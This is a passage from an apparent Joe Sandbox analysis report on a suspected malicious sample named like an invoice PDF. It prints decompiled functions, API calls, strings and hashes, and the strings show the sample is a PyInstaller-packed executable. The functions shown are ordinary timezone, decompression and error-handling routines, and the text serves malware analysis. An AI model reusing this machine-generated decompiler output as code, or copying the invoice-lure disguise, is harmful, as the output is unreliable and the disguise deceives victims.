                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction ID: 1677a5719b423ada13280ea3b751034c7d546d6b5266aea8b311a38d52ffd5a3
                            • Opcode Fuzzy Hash: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction Fuzzy Hash: F0A15632A041299FDF2DEF7CD881BADBBA5AB06328F140159E815DF396DB359802CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E0132AFBE(void* __eflags, signed int _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				int _v16;
                            				int _v20;
                            				int _v24;
                            				char _v52;
                            				int _v56;
                            				int _v60;
                            				signed int _v100;
                            				char _v272;
                            				intOrPtr _v276;
                            				char _v280;
                            				char _v356;
                            				char _v360;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t65;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t78;
                            				void* _t80;
                            				signed int _t84;
                            				signed int _t88;
                            				signed int _t90;
                            				long _t92;
                            				signed int* _t95;
                            				signed int _t98;
                            				signed int _t101;
                            				signed int _t105;
                            				void* _t112;
                            				signed int _t115;
                            				void* _t116;
                            				void* _t118;
                            				void* _t119;
                            				void* _t121;
                            				signed int _t123;
                            				signed int _t124;
                            				signed int _t127;
                            				void* _t130;
                            				void* _t132;
                            				signed int _t133;
                            				signed int _t135;
                            				void* _t141;
                            				intOrPtr _t142;
                            				void* _t144;
                            				signed int _t151;
                            				signed int _t152;
                            				signed int _t155;
                            				signed int _t159;
                            				signed int _t162;
                            				intOrPtr* _t167;
                            				intOrPtr _t168;
                            				signed int _t169;
                            				intOrPtr* _t170;
                            				void* _t171;
                            				void* _t172;
                            				signed int _t173;
                            				int _t177;
                            				signed int _t179;
                            				char** _t180;
                            				signed int _t184;
                            				signed int _t186;
                            				void* _t195;
                            				signed int _t196;
                            				void* _t197;
                            				signed int _t198;
                            
                            				_push(_t179);
                            				_t65 = E0132ABFC();
                            				_v8 = _v8 & 0x00000000;
                            				_t135 = _t65;
                            				_v16 = _v16 & 0x00000000;
                            				_v12 = _t135;
                            				if(E0132AC5A( &_v8) != 0 || E0132AC02( &_v16) != 0) {
                            					L46:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E01321798();
                            					asm("int3");
                            					_t195 = _t197;
                            					_t198 = _t197 - 0x10;
                            					_push(_t135);
                            					_t180 = E0132ABFC();
                            					_v52 = 0;
                            					_v56 = 0;
                            					_v60 = 0;
                            					_t72 = E0132AC5A( &_v52);
                            					_t144 = _t179;
                            					__eflags = _t72;
                            					if(_t72 != 0) {
                            						L66:
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E01321798();
                            						asm("int3");
                            						_push(_t195);
                            						_t196 = _t198;
                            						_t74 =  *0x133c008; // 0xa212446c
                            						_v100 = _t74 ^ _t196;
                            						 *0x133c91c =  *0x133c91c | 0xffffffff;
                            						 *0x133c910 =  *0x133c910 | 0xffffffff;
                            						_push(0);
                            						_push(_t180);
                            						_push(_t172);
                            						_t137 = "TZ";
                            						_t173 = 0;
                            						 *0x1346578 = 0;
                            						_t78 = E01326CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ"); // executed
                            						__eflags = _t78;
                            						if(_t78 != 0) {
                            							__eflags = _t78 - 0x22;
                            							if(_t78 == 0x22) {
                            								_t186 = E01320A25(_t144, _v276);
                            								__eflags = _t186;
                            								if(__eflags != 0) {
                            									_t84 = E01326CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
                            									__eflags = _t84;
                            									if(_t84 == 0) {
                            										E013209EB(0);
                            										_t173 = _t186;
                            									} else {
                            										_push(_t186);
                            										goto L72;
                            									}
                            								} else {
                            									_push(0);
                            									L72:
                            									E013209EB();
                            								}
                            							}
                            						} else {
                            							_t173 =  &_v272;
                            						}
                            						asm("sbb esi, esi");
                            						_t184 =  ~(_t173 -  &_v272) & _t173;
                            						__eflags = _t173;
                            						if(_t173 == 0) {
                            							L80:
                            							L47(); // executed
                            						} else {
                            							__eflags =  *_t173;
                            							if(__eflags == 0) {
                            								goto L80;
                            							} else {
                            								_push(_t173);
                            								E0132AFBE(__eflags);
                            							}
                            						}
                            						_t80 = E013209EB(_t184);
                            						__eflags = _v16 ^ _t196;
                            						E0131786A();
                            						return _t80;
                            					} else {
                            						_t88 = E0132AC02( &_v16);
                            						_pop(_t144);
                            						__eflags = _t88;
                            						if(_t88 != 0) {
                            							goto L66;
                            						} else {
                            							_t90 = E0132AC2E( &_v20);
                            							_pop(_t144);
                            							__eflags = _t90;
                            							if(_t90 != 0) {
                            								goto L66;
                            							} else {
                            								E013209EB( *0x1346574);
                            								 *0x1346574 = 0;
                            								 *_t198 = 0x1346580; // executed
                            								_t92 = GetTimeZoneInformation(??); // executed
                            								__eflags = _t92 - 0xffffffff;
                            								if(_t92 != 0xffffffff) {
                            									_t151 =  *0x1346580 * 0x3c;
                            									_t169 =  *0x13465d4; // 0x0
                            									_push(_t172);
                            									 *0x1346578 = 1;
                            									_v12 = _t151;
                            									__eflags =  *0x13465c6; // 0xb
                            									if(__eflags != 0) {
                            										_t152 = _t151 + _t169 * 0x3c;
                            										__eflags = _t152;
                            										_v12 = _t152;
                            									}
                            									__eflags =  *0x134661a; // 0x3
                            									if(__eflags == 0) {
                            										L56:
                            										_v16 = 0;
                            										_v20 = 0;
                            									} else {
                            										_t105 =  *0x1346628; // 0xffffffc4
                            										__eflags = _t105;
                            										if(_t105 == 0) {
                            											goto L56;
                            										} else {
                            											_v16 = 1;
                            											_v20 = (_t105 - _t169) * 0x3c;
                            										}
                            									}
                            									_t177 = E01327D59(0, _t169);
                            									_t98 = WideCharToMultiByte(_t177, 0, "Pacific Standard Time", 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
                            									__eflags = _t98;
                            									if(_t98 == 0) {
                            										L60:
                            										 *( *_t180) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L60;
                            										} else {
                            											( *_t180)[0x3f] = 0;
                            										}
                            									}
                            									_t101 = WideCharToMultiByte(_t177, 0, "Pacific Daylight Time", 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
                            									__eflags = _t101;
                            									if(_t101 == 0) {
                            										L64:
                            										 *(_t180[1]) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L64;
                            										} else {
                            											_t180[1][0x3f] = 0;
                            										}
                            									}
                            								}
                            								 *(E0132ABF6()) = _v12;
                            								 *((intOrPtr*)(E0132ABEA())) = _v16;
                            								_t95 = E0132ABF0();
                            								 *_t95 = _v20;
                            								return _t95;
                            							}
                            						}
                            					}
                            				} else {
                            					_t170 =  *0x1346574; // 0x0
                            					_t179 = _a4;
                            					if(_t170 == 0) {
                            						L12:
                            						E013209EB(_t170);
                            						_t155 = _t179;
                            						_t12 = _t155 + 1; // 0x132b3af
                            						_t171 = _t12;
                            						do {
                            							_t112 =  *_t155;
                            							_t155 = _t155 + 1;
                            						} while (_t112 != 0);
                            						_t13 = _t155 - _t171 + 1; // 0x132b3b0
                            						 *0x1346574 = E01320A25(_t155 - _t171, _t13);
                            						_t115 = E013209EB(0);
                            						_t168 =  *0x1346574; // 0x0
                            						if(_t168 == 0) {
                            							goto L45;
                            						} else {
                            							_t159 = _t179;
                            							_push(_t172);
                            							_t14 = _t159 + 1; // 0x132b3af
                            							_t172 = _t14;
                            							do {
                            								_t116 =  *_t159;
                            								_t159 = _t159 + 1;
                            							} while (_t116 != 0);
                            							_t15 = _t159 - _t172 + 1; // 0x132b3b0
                            							_t118 = E01320A73(_t168, _t15, _t179);
                            							_t197 = _t197 + 0xc;
                            							if(_t118 != 0) {
                            								goto L46;
                            							} else {
                            								_t172 = 3;
                            								_push(_t172);
                            								_t119 = E013250A9(_t160,  *_t135, 0x40, _t179);
                            								_t197 = _t197 + 0x10;
                            								if(_t119 != 0) {
                            									goto L46;
                            								} else {
                            									while( *_t179 != 0) {
                            										_t179 = _t179 + 1;
                            										_t172 = _t172 - 1;
                            										if(_t172 != 0) {
                            											continue;
                            										}
                            										break;
                            									}
                            									_pop(_t172);
                            									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
                            									if(_t135 != 0) {
                            										_t179 = _t179 + 1;
                            									}
                            									_t162 = E01321594(_t160, _t179) * 0xe10;
                            									_v8 = _t162;
                            									while(1) {
                            										_t121 =  *_t179;
                            										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
                            											break;
                            										}
                            										_t179 = _t179 + 1;
                            									}
                            									__eflags =  *_t179 - 0x3a;
                            									if( *_t179 == 0x3a) {
                            										_t179 = _t179 + 1;
                            										_t162 = _v8 + E01321594(_t162, _t179) * 0x3c;
                            										_v8 = _t162;
                            										while(1) {
                            											_t130 =  *_t179;
                            											__eflags = _t130 - 0x30;
                            											if(_t130 < 0x30) {
                            												break;
                            											}
                            											__eflags = _t130 - 0x39;
                            											if(_t130 <= 0x39) {
                            												_t179 = _t179 + 1;
                            												__eflags = _t179;
                            												continue;
                            											}
                            											break;
                            										}
                            										__eflags =  *_t179 - 0x3a;
                            										if( *_t179 == 0x3a) {
                            											_t179 = _t179 + 1;
                            											_t162 = _v8 + E01321594(_t162, _t179);
                            											_v8 = _t162;
                            											while(1) {
                            												_t132 =  *_t179;
                            												__eflags = _t132 - 0x30;
                            												if(_t132 < 0x30) {
                            													goto L38;
                            												}
                            												__eflags = _t132 - 0x39;
                            												if(_t132 <= 0x39) {
                            													_t179 = _t179 + 1;
                            													__eflags = _t179;
                            													continue;
                            												}
                            												goto L38;
                            											}
                            										}
                            									}
                            									L38:
                            									__eflags = _t135;
                            									if(_t135 != 0) {
                            										_v8 = _t162;
                            									}
                            									__eflags =  *_t179;
                            									_t123 = 0 |  *_t179 != 0x00000000;
                            									_v16 = _t123;
                            									__eflags = _t123;
                            									_t124 = _v12;
                            									if(_t123 == 0) {
                            										_t29 = _t124 + 4; // 0xfffffddd
                            										 *((char*)( *_t29)) = 0;
                            										goto L44;
                            									} else {
                            										_push(3);
                            										_t28 = _t124 + 4; // 0xfffffddd
                            										_t127 = E013250A9(_t162,  *_t28, 0x40, _t179);
                            										_t197 = _t197 + 0x10;
                            										__eflags = _t127;
                            										if(_t127 == 0) {
                            											L44:
                            											 *(E0132ABF6()) = _v8;
                            											_t115 = E0132ABEA();
                            											 *_t115 = _v16;
                            											goto L45;
                            										} else {
                            											goto L46;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					} else {
                            						_t167 = _t170;
                            						_t133 = _t179;
                            						while(1) {
                            							_t141 =  *_t133;
                            							if(_t141 !=  *_t167) {
                            								break;
                            							}
                            							if(_t141 == 0) {
                            								L8:
                            								_t115 = 0;
                            							} else {
                            								_t9 = _t133 + 1; // 0xdde805eb
                            								_t142 =  *_t9;
                            								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
                            									break;
                            								} else {
                            									_t133 = _t133 + 2;
                            									_t167 = _t167 + 2;
                            									if(_t142 != 0) {
                            										continue;
                            									} else {
                            										goto L8;
                            									}
                            								}
                            							}
                            							L10:
                            							if(_t115 == 0) {
                            								L45:
                            								return _t115;
                            							} else {
                            								_t135 = _v12;
                            								goto L12;
                            							}
                            							goto L82;
                            						}
                            						asm("sbb eax, eax");
                            						_t115 = _t133 | 0x00000001;
                            						__eflags = _t115;
                            						goto L10;
                            					}
                            				}
                            				L82:
                            			}
                            0x0132b02b
                            0x0132b019
                            0x0132b019
                            0x0132b019
                            0x0132b01f
                            0x00000000
                            0x0132b021
                            0x0132b021
                            0x0132b024
                            0x0132b029
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132b029
                            0x0132b01f
                            0x0132b034
                            0x0132b036
                            0x0132b180
                            0x0132b185
                            0x0132b03c
                            0x0132b03c
                            0x00000000
                            0x0132b03c
                            0x00000000
                            0x0132b036
                            0x0132b02f
                            0x0132b031
                            0x0132b031
                            0x00000000
                            0x0132b031
                            0x0132b009
                            0x00000000

                            APIs
                            • _free.LIBCMT ref: 0132B040
                            • _free.LIBCMT ref: 0132B064
                            • _free.LIBCMT ref: 0132B1EB
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B3B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 314583886-1154798116
                            • Opcode ID: e2d1dbeffe8d3028d7ac62ea27825487dc6fc9dc4a54444adf2f57a304a91eac
                            • Instruction ID: ad1e6ccfdb1e434a41802fe5c3c720eb15ba9e5c4ffc7f115376f5ba56a64db3
                            • Opcode Fuzzy Hash: e2d1dbeffe8d3028d7ac62ea27825487dc6fc9dc4a54444adf2f57a304a91eac
                            • Instruction Fuzzy Hash: 2AC15A71D00325AFDB25FF7C8841AAEFBBCEF46358F14419AD99097249EB309A41C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 55%
                            			E01311220(void* __ecx, void* __edx) {
                            				void* __ebx;
                            				void* __ebp;
                            				intOrPtr _t10;
                            				void* _t12;
                            				void* _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t32;
                            				void* _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr _t41;
                            				intOrPtr _t44;
                            				void* _t49;
                            				void* _t51;
                            				void* _t52;
                            
                            				_t38 = __edx;
                            				_t37 = __ecx;
                            				_t39 =  *((intOrPtr*)(_t49 + 8));
                            				if( *_t39 != 0) {
                            					L3:
                            					_t44 =  *((intOrPtr*)(_t49 + 0x14));
                            					_push(0);
                            					L01317864();
                            					_t12 = E01319F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
                            					_push( *((intOrPtr*)(_t44 + 8)));
                            					L01317864();
                            					_push(_t12);
                            					_t32 = E01319808(_t37);
                            					_t51 = _t49 + 0x10;
                            					__eflags = _t32;
                            					if(__eflags != 0) {
                            						_push( *_t39);
                            						L01317864();
                            						_t14 = E01319B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
                            						_t52 = _t51 + 0x10;
                            						__eflags = _t14 - 1;
                            						if(__eflags >= 0) {
                            							__eflags =  *((char*)(_t44 + 0x10)) - 1;
                            							if(__eflags != 0) {
                            								L10:
                            								_t15 =  *_t39;
                            								__eflags = _t15;
                            								if(__eflags != 0) {
                            									_push(_t15); // executed
                            									E01319889(_t37, _t38, __eflags); // executed
                            									 *_t39 = 0;
                            								}
                            								return _t32;
                            							} else {
                            								_push(_t44);
                            								_t41 = E01311030(_t14, _t32, _t37, __eflags, _t32);
                            								L01319803(_t32);
                            								_t52 = _t52 + 0xc;
                            								_t32 = _t41;
                            								__eflags = _t41;
                            								if(__eflags != 0) {
                            									goto L10;
                            								} else {
                            									E01311980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
                            									__eflags = 0;
                            									return 0;
                            								}
                            							}
                            						} else {
                            							_push("Could not read from file\n");
                            							E01311980(__eflags);
                            							L01319803(_t32);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Could not allocate read buffer\n");
                            						E01311980(__eflags);
                            						__eflags = 0;
                            						return 0;
                            					}
                            				} else {
                            					_t10 = E013128C0(_t39 + 0x68, "rb");
                            					_t49 = _t49 + 8;
                            					 *_t39 = _t10;
                            					_t59 = _t10;
                            					if(_t10 != 0) {
                            						goto L3;
                            					} else {
                            						_push("Cannot open archive file\n");
                            						E01311980(_t59);
                            						return 0;
                            					}
                            				}
                            			}

                            APIs
                            Strings
                            • Cannot open archive file, xrefs: 01311241
                            • Could not read from file, xrefs: 013112B5
                            • Error decompressing %s, xrefs: 013112F2
                            • Could not allocate read buffer, xrefs: 01311287
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            • API String ID: 3757756281-3387914768
                            • Opcode ID: 39eb761703b1aeb2ec57b5b08f5400743214b8df73a308d97527a5a268ddcd11
                            • Instruction ID: f77e0b07d89179bdd72eeec44cccbfde91d9a02c9d2a01d116a45d443ecc958d
                            • Opcode Fuzzy Hash: 39eb761703b1aeb2ec57b5b08f5400743214b8df73a308d97527a5a268ddcd11
                            • Instruction Fuzzy Hash: 9521D8F2A003067AEB187A7DBC41BDEBB89AF6115DF540531FE04D120EF762D56083A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 73%
                            			E0132B193(void* __eflags) {
                            				int _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				signed int _v56;
                            				char _v268;
                            				intOrPtr _v272;
                            				char _v276;
                            				char _v312;
                            				char _v316;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				void* _t36;
                            				signed int _t38;
                            				signed int _t42;
                            				void* _t45;
                            				signed int _t49;
                            				void* _t53;
                            				void* _t55;
                            				long _t57;
                            				signed int* _t60;
                            				intOrPtr _t70;
                            				void* _t79;
                            				signed int _t86;
                            				void* _t88;
                            				signed int _t89;
                            				signed int _t91;
                            				int _t95;
                            				void* _t97;
                            				char** _t98;
                            				signed int _t102;
                            				signed int _t104;
                            				signed int _t110;
                            				signed int _t111;
                            				intOrPtr _t120;
                            				intOrPtr _t122;
                            
                            				_t98 = E0132ABFC();
                            				_v8 = 0;
                            				_v12 = 0;
                            				_v16 = 0;
                            				_t36 = E0132AC5A( &_v8);
                            				_t79 = _t97;
                            				if(_t36 != 0) {
                            					L19:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E01321798();
                            					asm("int3");
                            					_t110 = _t111;
                            					_t38 =  *0x133c008; // 0xa212446c
                            					_v56 = _t38 ^ _t110;
                            					 *0x133c91c =  *0x133c91c | 0xffffffff;
                            					 *0x133c910 =  *0x133c910 | 0xffffffff;
                            					_push(0);
                            					_push(_t98);
                            					_t76 = "TZ";
                            					_t91 = 0;
                            					 *0x1346578 = 0;
                            					_t42 = E01326CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ"); // executed
                            					__eflags = _t42;
                            					if(_t42 != 0) {
                            						__eflags = _t42 - 0x22;
                            						if(_t42 == 0x22) {
                            							_t104 = E01320A25(_t79, _v272);
                            							__eflags = _t104;
                            							if(__eflags != 0) {
                            								_t49 = E01326CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
                            								__eflags = _t49;
                            								if(_t49 == 0) {
                            									E013209EB(0);
                            									_t91 = _t104;
                            								} else {
                            									_push(_t104);
                            									goto L25;
                            								}
                            							} else {
                            								_push(0);
                            								L25:
                            								E013209EB();
                            							}
                            						}
                            					} else {
                            						_t91 =  &_v268;
                            					}
                            					asm("sbb esi, esi");
                            					_t102 =  ~(_t91 -  &_v268) & _t91;
                            					__eflags = _t91;
                            					if(__eflags == 0) {
                            						L33:
                            						E0132B193(__eflags); // executed
                            					} else {
                            						__eflags =  *_t91;
                            						if(__eflags == 0) {
                            							goto L33;
                            						} else {
                            							_push(_t91);
                            							E0132AFBE(__eflags);
                            						}
                            					}
                            					_t45 = E013209EB(_t102);
                            					__eflags = _v12 ^ _t110;
                            					E0131786A();
                            					return _t45;
                            				} else {
                            					_t53 = E0132AC02( &_v12);
                            					_pop(_t79);
                            					if(_t53 != 0) {
                            						goto L19;
                            					} else {
                            						_t55 = E0132AC2E( &_v16);
                            						_pop(_t79);
                            						if(_t55 != 0) {
                            							goto L19;
                            						} else {
                            							E013209EB( *0x1346574);
                            							 *0x1346574 = 0;
                            							 *_t111 = 0x1346580; // executed
                            							_t57 = GetTimeZoneInformation(??); // executed
                            							if(_t57 != 0xffffffff) {
                            								_t86 =  *0x1346580 * 0x3c;
                            								_t89 =  *0x13465d4; // 0x0
                            								_push(_t90);
                            								 *0x1346578 = 1;
                            								_v8 = _t86;
                            								_t120 =  *0x13465c6; // 0xb
                            								if(_t120 != 0) {
                            									_v8 = _t86 + _t89 * 0x3c;
                            								}
                            								_t122 =  *0x134661a; // 0x3
                            								if(_t122 == 0) {
                            									L9:
                            									_v12 = 0;
                            									_v16 = 0;
                            								} else {
                            									_t70 =  *0x1346628; // 0xffffffc4
                            									if(_t70 == 0) {
                            										goto L9;
                            									} else {
                            										_v12 = 1;
                            										_v16 = (_t70 - _t89) * 0x3c;
                            									}
                            								}
                            								_t95 = E01327D59(0, _t89);
                            								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *( *_t98) = 0;
                            								} else {
                            									( *_t98)[0x3f] = 0;
                            								}
                            								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *(_t98[1]) = 0;
                            								} else {
                            									_t98[1][0x3f] = 0;
                            								}
                            							}
                            							 *(E0132ABF6()) = _v8;
                            							 *(E0132ABEA()) = _v12;
                            							_t60 = E0132ABF0();
                            							 *_t60 = _v16;
                            							return _t60;
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B1EB
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 0132B3B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 1286116820-1154798116
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311030(void* __eax, void* __ebx, void* __ecx, void* __eflags, intOrPtr _a8) {
                            				intOrPtr _v0;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v44;
                            				intOrPtr _v52;
                            				intOrPtr _v60;
                            				char _v68;
                            				intOrPtr _t19;
                            				intOrPtr _t20;
                            				intOrPtr _t36;
                            				intOrPtr _t37;
                            
                            				_t36 = _a8;
                            				_push( *((intOrPtr*)(_t36 + 0xc)));
                            				L01317864();
                            				_t19 = E01319808(__ecx); // executed
                            				_t37 = _t19;
                            				_t47 = _t37;
                            				if(_t37 != 0) {
                            					_t20 = _v0;
                            					_push( *((intOrPtr*)(_t36 + 8)));
                            					_v28 = 0;
                            					_v24 = 0;
                            					_v20 = 0;
                            					_v60 = _t20;
                            					L01317864();
                            					_push( *((intOrPtr*)(_t36 + 0xc)));
                            					_v60 = _t20;
                            					_v52 = _t37;
                            					L01317864();
                            					_v52 = _t20;
                            					__eflags = E01316720( &_v68, "1.2.11", 0x38);
                            					if(__eflags < 0) {
                            						_push(_v44);
                            						E01311980(__eflags, "Error %d from inflateInit: %s\n", _t22);
                            						__eflags = 0;
                            						return 0;
                            					} else {
                            						_push(4);
                            						_push( &_v68);
                            						__eflags = E01314E60();
                            						if(__eflags < 0) {
                            							_push(_v44);
                            							E01311980(__eflags, "Error %d from inflate: %s\n", _t26);
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							E013165F0(__ebx,  &_v68);
                            							return _t37;
                            						}
                            					}
                            				} else {
                            					_push("Error allocating decompression buffer\n");
                            					E01311980(_t47);
                            					return 0;
                            				}
                            			}
















                            APIs
                            Strings
                            • 1.2.11, xrefs: 013110A7
                            • Error %d from inflateInit: %s, xrefs: 01311100
                            • Error %d from inflate: %s, xrefs: 013110E6
                            • Error allocating decompression buffer, xrefs: 01311050
                            Similarity
                            • API ID: htonl
                            • String ID: 1.2.11$Error %d from inflate: %s$Error %d from inflateInit: %s$Error allocating decompression buffer
                            • API String ID: 2009864989-3188157777
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 63%
                            			E01314860(void* __edx, signed int _a8192, long _a8200) {
                            				short _v0;
                            				signed int _t8;
                            				long _t10;
                            				long _t11;
                            				void* _t24;
                            				signed int _t26;
                            
                            				_t24 = __edx;
                            				E01317880();
                            				_t8 =  *0x133c008; // 0xa212446c
                            				_a8192 = _t8 ^ _t26;
                            				_t10 = _a8200;
                            				if(_t10 == 0) {
                            					_t10 = GetLastError();
                            				}
                            				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0); // executed
                            				_t32 = _t11;
                            				if(_t11 != 0) {
                            					__eflags = E01314C90("An attempt to set the process default activation context failed because the process default activation context was already set.",  &_v0, 0x1000);
                            					_t19 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					_t14 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					__eflags = _a8192 ^ _t26 + 0x0000000c;
                            					E0131786A();
                            					return  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            				} else {
                            					_push("No error messages generated.\n");
                            					_push("FormatMessageW");
                            					E01311860(_t24, _t32);
                            					E0131786A();
                            					return "PyInstaller: FormatMessageW failed.";
                            				}
                            			}










                            APIs
                            • GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 013148EF
                            • An attempt to set the process default activation context failed because the process default activation context was already set., xrefs: 013148E2, 013148F6
